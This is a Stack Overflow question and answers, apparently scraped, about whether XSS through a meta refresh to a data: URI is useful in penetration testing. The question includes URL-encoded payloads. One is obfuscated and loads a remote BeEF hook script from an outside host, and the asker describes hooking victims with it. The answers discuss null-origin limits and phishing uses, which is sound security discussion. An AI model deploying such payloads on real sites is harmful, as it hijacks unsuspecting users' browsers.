问题
Some professional pentester guy told me this xss test vector is useless for pentest.And the payload seems like this:
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
but when i'm save the code to a HTML file with more powerful javascript like hook.js (from beef exploit framework).
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly on firefox and chrome.i can see the victim online with my beef exploit framework and a lot of function is available.
I dont really get it.what's wrong with this payload.I have asked this question several times but there is no response from him . it makes me very confuse.Is there any body can tell me why he said this one is useless for pentest.
回答1:
XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious javascript on the hosting domain, but will only work in Safari; all other browsers refuse to follow a location: javascript: header.
When using a data URI in the tag, the browser will load the decoded payload into a null domain and any javascript will be fired in the context of a null domain. While this can still be used to fire redirects, XHR, and other such attacks it is useless for accessing anything on the hosting domain. This attack will also not work in IE since it only allows data URIs for image type elements, and I think that is even restricted to style/css.
Though meta tag injections are only successful for XSS in very limited capacity, they are still very dangerous in other attacks and are worth testing.
回答2:
As far as I remember data:-URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However this could be used to deliver an exploit or for phishing, so I wouldnt call it totally useless.
来源:https://stackoverflow.com/questions/18947139/xss-in-meta-tag